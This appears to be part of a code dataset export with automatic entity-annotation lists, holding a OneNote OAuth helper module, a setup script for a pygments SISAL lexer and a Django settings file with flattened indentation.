['URL', 'm1.sm'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 
'instance.mo'], ['URL', 'm1.sm'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'm1.sm'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'data.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group.id'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.in'], ['URL', 'type.sh'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'cidr.should.co'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.mo'], ['URL', 'client.ru'], ['URL', 'instance.should.co'], ['URL', 'instance.should.co'], ['URL', '.should.be.gr'], ['URL', '.should.be.gr'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'subnet.id'], ['URL', 'group1.na'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', '.id.sh'], ['URL', 'eni.id'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'instance.groups.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 
'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group1.id'], ['URL', 'boto.ec2.net'], ['URL', 'eni.id'], ['URL', 'conn.ru'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group1.id'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group2.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidAttachmentID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'address.sh'], ['URL', 'name.should.co'], ['URL', 'address.re'], ['URL', 'instance.pr'], ['URL', 'address.sh'], ['URL', 'instance.pr'], ['URL', 'name.should.co'], ['URL', 'instance.pr'], ['URL', 'address.re'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ke'], ['URL', 'name.sh'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'volume.cr'], ['URL', 'snapshot.sn'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'snapshot.sn'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'status.status.sh'], ['URL', 'status.status.sh'], ['URL', 'boto.co'], 
['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', '.id.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.de'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.st'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'name.sh'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', 's.id'], ['URL', 'instance1.id'], ['URL', 'status1.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance2.id'], ['URL', 'status2.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance3.id'], ['URL', 'status3.st'], ['URL', 'name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'conn.cr'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'group.in'], ['URL', 'instance.id'], ['URL', 'boto3.re'], ['URL', 'client.cr'], ['URL', '.should.be'], ['URL', 'instance.mo'], ['URL', '.should.be'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'instance.mo'], ['URL', 'optimized.should.be'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', '.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'response.should.have.ke'], ['URL', 'response.should.have.ke'], ['URL', '.should.be'], ['URL', 'client.de'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.re'], ['URL', 'ec2.cr']]"
69,"""""""
PyOneNote.py
~~~~~~~~~~~~~~~~~

This module contains a basic OAuth 2 authentication handler and basic handlers for GET and POST operations.
This work was just a quick hack to migrate notes from an old database to OneNote, but it should help you
to understand the request structure of OneNote.

Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.
See LICENSE in the project root for license information.
"""
import requests


class OAuth:
    """Handles the authentication for all requests."""

    def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):
        """This information is obtained upon registration of a new Outlook application.
        The values below are just for illustration and are not valid:

        :param client_id: "cda3ffaa-2345-a122-3454-adadc556e7bf"
        :param client_secret: "AABfsafd6Q5d1VZmJQNsdac"
        :param code: "PI:KEY"
        :param token: "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"
        :param refresh_token: "MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......"
        """
        self.client_id = client_id
        self.client_secret = client_secret
        self.code = code
        self.token = token
        self.rtoken = refresh_token
        self.redirect_uri = 'https://localhost'
        self.session = requests.Session()

    @staticmethod
    def get_authorize_url(client_id):
        """Open this URL in a browser to let the user grant access to OneNote.
        Extract your access code from the redirect URL."""
        url = "https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format(
            client_id)
        return url
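    # Illustrative example (not part of the original module): after the user
    # grants access, the browser is redirected to something like
    #   https://localhost/?code=M11111111-2222-3333-4444-555555555555
    # and the value of the "code" query parameter is what the token request
    # below needs:
    #
    #   from urllib.parse import urlparse, parse_qs
    #   code = parse_qs(urlparse(redirected_url).query)["code"][0]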
    def get_token(self):
        """
        Exchange the access code for a token. Equivalent to making the following request with e.g. postman:

        POST https://login.live.com/oauth20_token.srf
        Content-Type:application/x-www-form-urlencoded

        grant_type:authorization_code
        client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
        client_secret:AABfsafd6Q5d1VZmJQNsdac
        code:111111111-1111-1111-1111-111111111111
        redirect_uri:https://localhost

        OneNote will return as result:
        {
          "token_type": "bearer",
          "expires_in": 3600,
          "scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
          "access_token": "AxxdWR1DBAAUGCCXc8wU/....",
          "refresh_token": "DR3DDEQJPCiM2aACbIYa....",
          "user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        }
        """
        # A sketch of the request documented above (originally left
        # unimplemented), mirroring refresh_token() below.
        url = 'https://login.live.com/oauth20_token.srf'
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = {"grant_type": "authorization_code",
                "client_id": self.client_id,
                "client_secret": self.client_secret,
                "code": self.code,
                "redirect_uri": self.redirect_uri}
        result = self.session.post(url, headers=headers, data=data)
        token_data = result.json()
        self.expire = token_data.get('expires_in')
        self.token = token_data.get('access_token')
        self.rtoken = token_data.get('refresh_token')
        return True
    def refresh_token(self):
        """
        Make the following request to refresh your token, e.g. with postman:

        POST https://login.live.com/oauth20_token.srf
        Content-Type:application/x-www-form-urlencoded

        grant_type:refresh_token
        client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
        client_secret:AABfsafd6Q5d1VZmJQNsdac
        refresh_token:DR3DDEQJPCiM2aACbIYa....
        redirect_uri:https://localhost

        -->
        {
          "token_type": "bearer",
          "expires_in": 3600,
          "scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
          "access_token": "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW...",
          "refresh_token": "DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss...",
          "user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        }
        """
        url = 'https://login.live.com/oauth20_token.srf'
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = {"grant_type": "refresh_token",
                "client_id": self.client_id,
                "client_secret": self.client_secret,
                "refresh_token": self.rtoken,
                "redirect_uri": self.redirect_uri}
        result = self.session.post(url, headers=headers, data=data)
        print("Refreshed token: " + result.text)
        refresh = result.json()
        self.expire = refresh.get('expires_in')
        self.token = refresh.get('access_token')
        self.rtoken = refresh.get('refresh_token')
        print("Token: " + self.token)
        print("Refresh Token: " + self.rtoken)
        return True
    def _get(self, url, query):
        """Handles a GET request with authentication."""
        headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
        result = self.session.get(url, headers=headers, params=query)
        print("GET " + result.url)
        print(result.headers)
        if result.text:
            print(result.text)
        return result

    def _post(self, url: str, headers: dict, data: str = None, files: list = None):
        """Handles a POST request with authentication.

        Note: headers is a dict of extra headers (the original annotation said
        "list", but a dict is what 'requests' expects and what callers pass).
        """
        newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
        if data:
            newHeaders.update(headers)
            result = self.session.post(url, headers=newHeaders, data=data)
        else:
            result = self.session.post(url, headers=newHeaders, files=files)
        print("POST " + result.url)
        print(result.headers)
        if result.text:
            print(result.text)
        return result
    def post(self, url: str, headers: dict, data: str = None, files: list = None):
        """Post something and handle token expiry transparently to the caller."""
        try:
            result = self._post(url, headers, data=data, files=files)
            if result.status_code not in (200, 201):
                print("Error: " + str(result.status_code))
                if result.status_code == 401:
                    print("Refreshing token")
                    if self.refresh_token():
                        result = self._post(url, headers, data, files=files)
                    else:
                        print('Failed retry refreshing token')
            return result
        except Exception as e:
            print(e)

    def get(self, url, query, headers=None):
        """Get something and handle token expiry transparently to the caller."""
        try:
            result = self._get(url, query)
            if result.status_code != requests.codes.ok:
                print("Error: " + str(result.status_code))
                if result.status_code == 401:
                    print("Refreshing token")
                    if self.refresh_token():
                        result = self._get(url, query)
                    else:
                        print('Failed retry refreshing token')
            return result
        except Exception as e:
            print(e)

    def get_credentials(self):
        """Return the actual credentials of this OAuth instance as a tuple:
        (client_id, client_secret, code, token, refresh_token)."""
        return self.client_id, self.client_secret, self.code, self.token, self.rtoken
class OneNote(OAuth):
    """This class wraps some OneNote-specific calls."""

    def __init__(self, client_id, client_secret, code, token, rtoken):
        super().__init__(client_id, client_secret, code, token, rtoken)
        self.base = "https://www.onenote.com/api/v1.0/me/"

    def list_notebooks(self):
        url = self.base + "notes/notebooks"
        query = {'top': '5'}
        result = self.get(url, query)
        n = None
        if result:
            notebooks = result.json()
            # result_serialized = json.dumps(result.text)
            # notebook = json.loads(result_serialized)
            n = notebooks["value"][0]
        return n
    def post_page(self, section_id: str, created, title: str, content: str, files: list = None):
        """Post a page. If you want to provide additional images for the page, pass them as a file list,
        in the same way as posting a multipart message with 'requests'.

        :param content: valid HTML text, with umlauts converted to XML entities (e.g. "ä" -> "&#228;")
        """
        url = self.base + "notes/sections/" + section_id + "/pages"
        headers = {"Content-Type": "application/xhtml+xml"}
        # The basic layout of a page is always the same: title and creation
        # time in the head, the HTML content in the body. (The XHTML skeleton
        # below is a reconstruction; the markup did not survive in this copy.)
        data = """<?xml version="1.0" encoding="utf-8" ?>
<html>
<head>
<title>{0}</title>
<meta name="created" content="{1}"/>
</head>
<body>
{2}
</body>
</html>""".format(title, created, content)
        result = None
        if files:
            # post as multipart
            newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))]
            newFiles.extend(files)
            result = self.post(url, {}, None, files=newFiles)
        else:
            # post as simple request
            result = self.post(url, headers, data)
        notebooks = None
        if result:
            notebooks = result.json()
            # result_serialized = json.dumps(result.text)
            # notebook = json.loads(result_serialized)
            # n = notebooks["value"][0]
        return notebooks
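
# Minimal usage sketch (an illustration, not part of the original module): the
# client id/secret and token values are placeholders you must replace with
# credentials from your own app registration, and 'name' is assumed to be the
# notebook-name field returned by the OneNote notebooks API.
if __name__ == '__main__':
    onenote = OneNote('my-client-id', 'my-client-secret', None,
                      'my-access-token', 'my-refresh-token')
    notebook = onenote.list_notebooks()
    if notebook:
        print(notebook['name'])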
",9316,"[['URL', 'https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format'], ['URL', ""https://login.live.com/oauth20_token.srf'""], ['DATE_TIME', '2016'], ['PERSON', 'self.rtoken ='], ['PERSON', 'self.rtoken'], ['URL', 'self.se'], ['PERSON', 'self.rtoken'], ['URL', 'self.session.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'requests.co'], ['LOCATION', 'self.base'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'self.ge'], ['PERSON', 'Umlaute'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://www.onenote.com/api/v1.0/me/""'], ['URL', 'PyOneNote.py'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.red'], ['URL', 'self.se'], ['URL', 'requests.Se'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.red'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'refresh.ge'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'result.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.ba']]"
70,"""""""pygments-sisal module setup script for distribution.""""""
from __future__ import with_statement

import os
import setuptools


def get_version(filename):
    with open(filename) as fh:
        for line in fh:
            if line.startswith('__version__'):
                return line.split('=')[-1].strip()[1:-1]


setuptools.setup(
    name='pygments-sisal',
    version=get_version(os.path.join('pygments_sisal', '__init__.py')),
    author='Alexander Asp Bock',
    author_email='dummy@email.com',
    platforms='All',
    description='A pygments lexer for SISAL',
    install_requires=['Pygments>=2.0'],
    license='MIT',
    keywords='pygments, lexer, sisal',
    url='https://github.com/MisanthropicBit/pygments-sisal',
    packages=setuptools.find_packages(),
    long_description=open('README.md').read(),
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Topic :: Utilities',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5'
    ],
    # Pygments entry point
    entry_points="[pygments.lexers]\n"
                 "sisal=pygments_sisal:SisalLexer"
)
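
# Once installed, the entry point above registers the lexer with Pygments
# under the name "sisal". A quick usage sketch (the sample source string is
# made up for illustration):
#
#   from pygments import highlight
#   from pygments.lexers import get_lexer_by_name
#   from pygments.formatters import TerminalFormatter
#
#   code = 'function main(returns integer) 42 end function'
#   print(highlight(code, get_lexer_by_name('sisal'), TerminalFormatter()))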
",1467,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', ""Asp Bock'""], ['URL', ""https://github.com/MisanthropicBit/pygments-sisal',""], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'line.st'], ['URL', 'setuptools.se'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'setuptools.fi'], ['URL', 'README.md']]"
71,"# -*- coding: utf-8 -*-
""""""
Django settings for saefacto project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
""""""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import join

# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
    from S3 import CallingFormat

    AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
    # TODO: fix this -- the import is attempted even in dev, where S3 is not installed.
    pass

from configurations import Configuration, values

BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Common(Configuration):
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# 'suit',
# Admin
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'parsley',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'users', # custom users app
'core',
'main',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
INSTALLED_APPS += (
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = values.BooleanValue(False)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
# In production, it is replaced by a values.SecretValue() setting.
SECRET_KEY = ""CHANGEME!!!""
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('Fábio C. Barrionuevo da Luz', 'dummy@email.com'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = values.DatabaseURLValue('postgres://localhost/saefacto')
########## END DATABASE CONFIGURATION
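# Note (an added aside, based on django-configurations' documented values API):
# DatabaseURLValue reads the DATABASE_URL environment variable by default, so
# the URL above is only a fallback. A typical override would look like:
#
#   export DATABASE_URL=postgres://user:password@db-host:5432/saefacto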
########## CACHING
# Do this here because, thanks to django-pylibmc-sasl and pylibmc, memcacheify is painful to install on Windows.
# memcacheify is what's used in Production
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
########## END CACHING
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Araguaina'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
LANGUAGES = (
('pt-br', u'Português do Brasil'),
('en', 'English'),
('es', u'Español'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
########## END GENERAL CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
""allauth.account.context_processors.account"",
""allauth.socialaccount.context_processors.socialaccount"",
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
# Your stuff: custom template context processors go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
########## END TEMPLATE CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = join(BASE_DIR, 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## URL Configuration
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
########## End URL Configuration
